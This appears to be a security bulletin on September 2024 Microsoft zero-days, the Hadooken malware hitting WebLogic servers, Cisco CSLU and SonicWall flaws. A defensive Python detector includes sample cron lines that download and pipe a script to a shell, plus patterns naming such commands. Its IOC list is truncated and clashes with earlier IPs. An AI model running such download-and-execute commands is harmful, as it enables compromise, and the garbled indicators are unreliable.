Microsoft Zero-Days and Related Vulnerabilities

SUMMARY

Microsoft’s September 2024 Patch Tuesday release addresses 79 security vulnerabilities, including three actively exploited zero-day vulnerabilities and one publicly disclosed zero-day. The update also resolves 7 critical issues, involving either remote code execution (RCE) or privilege escalation.

The full report is here:

https://www.bleepingcomputer.com/microsoft-patch-tuesday-reports/Microsoft-Patch-Tuesday-September-2024.html

The number of bugs in each vulnerability category is listed below:

  • 30 Elevation of Privilege Vulnerabilities
  • 4 Security Feature Bypass Vulnerabilities
  • 23 Remote Code Execution Vulnerabilities
  • 11 Information Disclosure Vulnerabilities
  • 8 Denial of Service Vulnerabilities
  • 3 Spoofing Vulnerabilities

Zero-day vulnerabilities fixed:

  • Microsoft classifies a zero-day vulnerability as one that is either publicly disclosed or actively exploited before an official fix is available. The four zero-days in this release are scored below and described under Vulnerability Details.

RISK SCORING

CVE-ID            CVSSv3 Score
CVE-2024-38014    7.8
CVE-2024-38217    5.4
CVE-2024-38226    7.3
CVE-2024-43491    9.8

VULNERABILITY DETAILS

The three actively exploited zero-day vulnerabilities patched in last Tuesday’s updates are:

  1. CVE-2024-38014 – Windows Installer Elevation of Privilege Vulnerability: This flaw allows attackers to gain SYSTEM privileges on Windows systems. Microsoft hasn’t provided details on how it was used in attacks.
  2. CVE-2024-38217 – Windows Mark of the Web (MOTW) Security Bypass Vulnerability: Publicly disclosed by Joe Desimone of Elastic Security, this flaw has likely been exploited since 2018. Desimone’s report outlines ‘LNK stomping,’ a technique using specially crafted LNK files to bypass Smart App Control and MOTW security warnings, allowing malicious files to be opened without alerts.
  3. CVE-2024-38226 – Microsoft Publisher Security Feature Bypass Vulnerability: This vulnerability allows attackers to bypass Office macro policies that block untrusted or malicious files. Microsoft has not revealed the source of this discovery or how it was exploited.

PUBLICLY DISCLOSED ZERO-DAY

CVE-2024-43491 – Microsoft Windows Update Remote Code Execution Vulnerability

This flaw in the servicing stack, though labeled as remote code execution, actually rolls back fixes for older vulnerabilities in certain Windows components. Specifically, it affects Windows 10 version 1507 (released in July 2015) and certain still-supported editions such as Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB.

Microsoft clarified that while the flaw reintroduces previously exploited vulnerabilities, there is no evidence it was known or exploited externally before Microsoft discovered it internally. According to Microsoft’s advisory, systems that installed the Windows security updates from March 2024 (KB5035858) through August 2024 were exposed to previously mitigated flaws being reintroduced in components such as Active Directory Lightweight Directory Services, Internet Explorer 11, and Windows Media Player.

RECOMMENDATIONS

  • Apply security patches to all affected systems.
  • CVE-2024-43491 is resolved by installing both the September 2024 Servicing Stack Update (KB5043936) and the September 2024 Windows security update (KB5043083), in that sequence.

Hadooken Malware Targeting Oracle WebLogic

SUMMARY

A new malware campaign was recently identified that targets Linux environments, focusing on crypto-mining and botnet malware deployment. This operation specifically targets Oracle Weblogic servers to deliver a malware strain called “Hadooken,” as reported by cloud security firm Aqua. “When Hadooken is executed, it installs Tsunami malware and deploys a crypto miner.”

TECHNICAL DETAILS

Oracle WebLogic Server is an enterprise-level Java EE application server, widely used for building, deploying, and managing large-scale distributed applications. It is popular in banking, e-commerce, and critical business systems due to its support for Java, transaction management, and scalability. WebLogic is often targeted in cyberattacks, primarily due to vulnerabilities such as deserialization flaws, improper access controls, and common misconfigurations – examples include weak credentials or exposed admin consoles. These weaknesses can lead to severe risks, including remote code execution (RCE), privilege escalation, and data breaches, especially if systems are not properly patched or secured.

The recent attack campaign leverages these vulnerabilities and configuration weaknesses to gain an initial foothold and execute arbitrary code on vulnerable WebLogic instances. The attack begins by deploying two nearly identical payloads: one written in Python and the other as a shell script. These payloads retrieve the “Hadooken” malware from a remote server, with IP addresses “89.185.85[.]102” or “185.174.136[.]204.”

The shell script version also searches directories containing SSH data, such as user credentials and known-host information, and uses that data to attack other servers the compromised host already knows. This enables lateral movement within the compromised environment, spreading Hadooken across the network and connected systems.

Hadooken itself consists of two primary components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet named “Tsunami” (also known as Kaiten). Tsunami has previously targeted Jenkins and WebLogic services, especially in Kubernetes environments. Once deployed, Hadooken ensures persistence by creating cron jobs that run the crypto miner at regular intervals.

To evade detection, Hadooken employs various defense evasion techniques. It uses Base64-encoded payloads and disguises malicious processes by naming them innocuously as “bash” or “java” to blend with legitimate system activity. Additionally, it deletes artifacts and traces of its execution to avoid detection.

The IP address 89.185.85[.]102 is associated with a hosting provider in Germany, Aeza International LTD (AS210644). A report from Uptycs in February 2024 linked this IP to the “8220 Gang,” which exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center for cryptocurrency mining. The same infrastructure is now implicated in the Hadooken campaign, reflecting a consistent trend of abusing known enterprise vulnerabilities.
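As an added example (not from the Aqua report or the campaign itself), the following Python checks a Linux host for the two behaviours described above: processes named bash or java whose binary does not resolve to an expected path, and crontab entries that decode an inline Base64 blob or pipe downloaded content into a shell. The expected binary paths, the process records and the cron lines are constructed for this example; live_procs() reads the real /proc when run on a host.

```python
import os
import re
from dataclasses import dataclass

# Paths a process legitimately named "bash" or "java" may resolve from (example values).
EXPECTED_EXE = {"bash": ("/bin/bash", "/usr/bin/bash"),
                "java": ("/usr/bin/java", "/usr/lib/jvm/")}
@dataclass
class Proc:
    pid: int
    comm: str  # name shown by ps, i.e. /proc/<pid>/comm
    exe: str   # target of the /proc/<pid>/exe symlink

def masquerading(procs):
    """Return PIDs whose name claims bash/java but whose binary lives elsewhere."""
    return [p.pid for p in procs
            if p.comm in EXPECTED_EXE and not p.exe.startswith(EXPECTED_EXE[p.comm])]

CRON_PATTERNS = [re.compile(r"base64\s+(-d|--decode)\b"),
                 re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")]
def suspicious_cron(lines):
    """Return non-comment crontab lines that decode an inline blob or pipe a download to a shell."""
    return [ln for ln in lines if not ln.lstrip().startswith("#")
            and any(p.search(ln) for p in CRON_PATTERNS)]

def live_procs():
    """Collect Proc records from /proc on a Linux host (skips processes that vanish)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            comm = open(f"/proc/{pid}/comm").read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue
        procs.append(Proc(int(pid), comm, exe))
    return procs

# Constructed sample telemetry (not real data) so the checks run offline.
SAMPLE_PROCS = [
    Proc(1200, "java", "/usr/lib/jvm/java-11-openjdk/bin/java"),  # WebLogic's real JVM
    Proc(4021, "java", "/tmp/.hidden/java"),  # miner renamed to blend in
    Proc(4022, "bash", "/dev/shm/bash"),      # bot renamed to blend in
]
SAMPLE_CRON = [
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/5 * * * * echo QUJDREVGRw== | base64 -d | sh",
    "@reboot curl -s http://198.51.100.7/x.sh | sh",  # documentation-range IP, constructed
]
```

On a real host, run masquerading(live_procs()) and feed the output of the system and per-user crontabs to suspicious_cron(); both return lists you can alert on.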

INDICATORS OF COMPROMISE (IOCs)

Hashes:

Attacker IP:

  • 174.136.204
  • 185.85.102

RECOMMENDATIONS

  • Ensure that Oracle WebLogic servers are consistently updated with the latest security patches to close known vulnerabilities like deserialization flaws.
  • Use strong, unique credentials for all admin and user accounts, and disable unnecessary admin interfaces. Implement multi-factor authentication (MFA) where possible.
  • Regularly audit server configurations to identify misconfigurations such as exposed admin consoles and weak credentials. Limit access to sensitive areas like SSH directories.
  • Set up intrusion detection systems (IDS) to monitor unusual traffic, especially from known malicious IP addresses, such as those linked to the Hadooken campaign.
  • Restrict the privileges of user accounts and processes to minimize the impact of potential malware execution.
  • Install and maintain anti-malware tools on all systems to detect and block malicious activities, including crypto miners and botnets like Tsunami.
  • Automate the process of identifying and mitigating vulnerabilities using tools such as vulnerability scanners and patch management solutions.
  • Segment the network to prevent malware from easily moving laterally between systems. Use firewalls and access control lists (ACLs) to enforce boundaries.
  • Maintain comprehensive logging of all system and network activities to detect unusual behaviors, such as unauthorized SSH access or cron job creations.
  • Ensure regular backups of critical systems and test recovery plans to minimize data loss in the event of a malware attack or breach.

How to Run a Tabletop Exercise (The Backup Wrap-up Podcast)

This episode of The Backup Wrap-up explores the vital role of tabletop exercises in cybersecurity preparedness. Dr. Mike Saylor, CEO of Blackswan Cybersecurity, offers an in-depth look at how to effectively plan and conduct these exercises. We discuss why these simulations are crucial for organizations of any size and how they can significantly enhance incident response capabilities.

Tune in to learn how to choose appropriate scenarios, engage key stakeholders, and foster a constructive learning environment. This podcast also highlights common mistakes to avoid and emphasizes the need for regular practice. Whether you’re just starting with tabletop exercises or aiming to refine your current approach, this episode delivers practical advice to boost your organization’s cyber resilience. Don’t miss out on this chance to elevate your incident response strategy!

Cisco Smart Licensing Utility Vulnerability

SUMMARY

Cisco recently addressed two critical vulnerabilities (CVE-2024-20439 and CVE-2024-20440) in the Cisco Smart Licensing Utility (CSLU), removing a backdoor administrative account and fixing an information disclosure flaw. These vulnerabilities could allow remote attackers to gain unauthorized administrative access or retrieve sensitive data. Users are advised to update to the latest version to prevent exploitation.

RISK SCORE

CVE-ID            CVSSv3 Score
CVE-2024-20439    9.8
CVE-2024-20440    9.8

VULNERABILITY DETAILS

CSLU is a Windows-based tool designed to manage licenses and associated products locally, without the need to connect to Cisco’s cloud-based Smart Software Manager.

The first flaw, CVE-2024-20439, involved a backdoor account that allowed unauthorized attackers to log in with administrative privileges using static, hardcoded credentials, through the API of the Cisco Smart Licensing Utility application. This vulnerability was particularly dangerous and allowed attackers to gain full access to systems remotely without authentication.

The second flaw, CVE-2024-20440, involved the exposure of sensitive log files containing API credentials, accessible through crafted HTTP requests. This vulnerability impacted only certain versions of the CSLU and posed a significant risk by leaking sensitive data that could be used in further attacks.

AFFECTED PRODUCTS

  • Cisco Smart License Utility 2.0.0, 2.1.0, and 2.2.0

REMEDIATION

  • Update to Cisco Smart License Utility 2.3.0 or later.

SonicWall Firewall Vulnerability

SUMMARY

SonicWall’s self-disclosed critical security vulnerability in SonicOS is now under active exploitation. Available updates should be applied as soon as possible. The vulnerability (CVE-2024-40766) has a CVSS score of 9.3 out of 10 and stems from improper access control in the SonicOS management interface and SSLVPN, which could allow unauthorized access to resources and, under certain conditions, trigger a firewall crash.

TECHNICAL DETAILS

CVE-2024-40766 is a critical access control vulnerability with a CVSS v3 score of 9.3, affecting multiple generations of SonicWall Firewall devices, including Gen 5, Gen 6, and Gen 7 models. The flaw, initially disclosed on August 22, 2024, affects the management interface of SonicOS, but recent updates indicate it also impacts the SSLVPN feature. The vulnerability could allow unauthorized resource access and may also lead to firewall crashes.

AFFECTED DEVICES AND VERSIONS

  • SonicWall Gen 5 running SonicOS version 5.9.2.14-12o and older: Fixed in SonicOS version 5.9.2.14-13o.
  • SonicWall Gen 6 running SonicOS version 6.5.4.14-109n and older: Fixed in 6.5.2.8-2n (for SM9800, NSsp 12400, NSsp 12800) and 6.5.4.15-116n (for other Gen 6 firewalls).
  • SonicWall Gen 7 running SonicOS version 7.0.1-5035 and older: The issue is not reproducible in version 7.0.1-5035 and later.

SonicWall has not provided detailed technical information on how the vulnerability is exploited but highlights its potential to allow unauthorized access and cause firewall failures, which could leave corporate networks exposed. Given that SonicWall firewalls are often accessible via the internet for VPN services, they are prime targets for exploitation.

RECOMMENDATIONS

SonicWall’s recommended steps for securing devices against CVE-2024-40766:

  • Restrict SonicOS management portal access to trusted sources only. Disabling internet access to the WAN management portal entirely can significantly reduce exposure.
  • Only allow SSLVPN access from trusted sources. If SSLVPN functionality is not required, disable it to further reduce attack surface.
  • For Gen 5 and Gen 6 devices, administrators should enforce immediate password changes for SSLVPN users with local accounts. The “User must change password” option should also be enabled for all local users.
  • Activate MFA for all SSLVPN users to add an additional layer of security. SonicWall supports MFA using Time-based One-Time Passwords (TOTP) or email-based OTPs, providing stronger protection against unauthorized access. Detailed configuration instructions for MFA are available on SonicWall’s support portal.
  • Ensure that all affected devices are running the latest patched firmware versions as outlined above. Regularly check for firmware updates and apply them promptly to mitigate known vulnerabilities.
